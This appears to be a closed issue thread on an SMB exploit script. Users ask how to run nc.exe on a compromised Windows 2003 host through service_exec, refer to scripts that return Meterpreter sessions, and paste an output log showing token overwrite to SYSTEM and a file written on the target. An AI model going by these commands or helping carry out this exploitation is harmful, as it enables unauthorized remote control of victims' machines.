Closed kalifan closed 7 years ago
I tried it in the LAN and it works fine; maybe in the WAN it does not work fine. Maybe it is AV, I don't know.
No support issue
On the same note: I have copied nc.exe onto Windows 2003 using the Python script. Now I want to invoke nc.exe using `service_exec(conn, r'cmd /c c:\nc.exe')`. How do I go about that?
I also tried `service_exec(conn, r'cmd /c c:\nc.exe c:\nc.exe`
There are already new scripts for SMB exploitation on the web that drop a payload onto the victims and execute it, and then return a Meterpreter session to you, which is much simpler. Those scripts are based on this one here with a few changes; search for it on GitHub.
The exploit is working fine, but I don't understand how it works to complete the process and get a Meterpreter session.
```
Target OS: Windows 5.1
Using named pipe: spoolss
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x84927da8
SESSION: 0xe2b8b190
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe3693030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe36930d0
overwriting token UserAndGroups
creating file c:\pwned.txt on the target
Done
```

Can someone help me? Thanks.